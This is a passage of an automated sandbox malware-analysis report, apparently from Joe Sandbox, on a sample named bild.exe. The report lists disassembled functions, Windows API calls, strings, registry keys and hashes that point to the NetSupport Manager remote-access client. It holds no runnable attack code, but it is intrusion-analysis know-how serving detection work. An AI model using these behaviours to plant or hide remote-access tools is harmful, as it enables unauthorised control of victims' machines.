                                                                                      • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                      • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                      • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                      Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                      • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                      • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                      • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                      • API String ID: 3360349984-1136101629
                                                                                      • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                      • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                      Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s%s%s.bin$051829$_HF$_HW$_SW
                                                                                      • API String ID: 2111968516-2890156708
                                                                                      • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                      • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                      Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                      • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                      • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                      • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                      • String ID: NSMDesktopWnd
                                                                                      • API String ID: 2669163067-206650970
                                                                                      • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                      • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                      Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                      • KillTimer.USER32(00000000,00007F5A,TermUI...), ref: 1113CCB3
                                                                                      • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeKillLibraryTimer
                                                                                      • String ID: TermUI
                                                                                      • API String ID: 2006562601-4085834059
                                                                                      • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                      • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                      Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                      • API String ID: 47109696-3245241687
                                                                                      • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                      • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                      Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                      • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                      • API String ID: 806825551-1858614750
                                                                                      • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                      • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                      Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                      • ResetEvent.KERNEL32(00000260), ref: 11144269
                                                                                      • SetEvent.KERNEL32(00000260), ref: 1114427F
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                      • String ID: MiniDump
                                                                                      • API String ID: 1494854734-2840755058
                                                                                      • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                      • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                      Function 6C5D8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                        • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
                                                                                        • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                      • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                      • API String ID: 3215810784-3459472706
                                                                                      • Opcode ID: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
                                                                                      • Instruction ID: 4573ae2351151d015c2c357bba2021c5f544f90380badc6162b9e0d8fb36d264
                                                                                      • Opcode Fuzzy Hash: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
                                                                                      • Instruction Fuzzy Hash: 6111E471A04316DFDF109B599C41BEA7374EB45306F010466DE19E7A40EB70BE48CFAA
                                                                                      Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                      • wsprintfA.USER32 ref: 11146E06
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                      • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                      • API String ID: 1985783259-2296142801
                                                                                      • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                      • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                      Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • _memset.LIBCMT ref: 1110F477
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                      • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                      • API String ID: 3234921582-2664294811
                                                                                      • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
